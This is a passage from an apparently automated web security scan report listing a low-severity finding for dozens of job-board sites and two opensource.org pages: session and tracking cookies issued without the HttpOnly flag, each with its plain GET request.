useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.99. http://www.marketingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.100. http://www.mediajobcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.101. http://www.medicalschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.medicalschoolloans.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.102. http://www.militarycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.103. http://www.nursingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.104. http://www.occupationaltherapycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.105. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.106. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.107. http://www.operationscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.108. http://www.parttimecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.109. http://www.pharmaceuticalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.110. http://www.physicalsecuritycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=gi8upuba219celoic2370527h4; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.111. http://www.physicaltherapycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.112. http://www.planningcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.113. http://www.postdoctoralfellowcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.114. http://www.prcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.115. http://www.preferredresumes.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.preferredresumes.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.116. http://www.procurementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.117. http://www.productmanagercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.118. http://www.projectmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.119. http://www.publicinterestcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.publicinterestcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.120. http://www.publishingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.publishingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.121. http://www.purchasingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.purchasingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.122. http://www.qaqccrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.qaqccrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.123. http://www.radiocrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.radiocrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.124. http://www.realestateandlandcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.realestateandlandcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.125. http://www.recruitingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.recruitingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.126. http://www.researchingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.researchingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.127. http://www.resumeboomer.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.resumeboomer.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.128. http://www.retailcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.129. http://www.sciencescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.130. http://www.scientistcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.131. http://www.sellingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.132. http://www.sqlcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.133. http://www.teenagercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

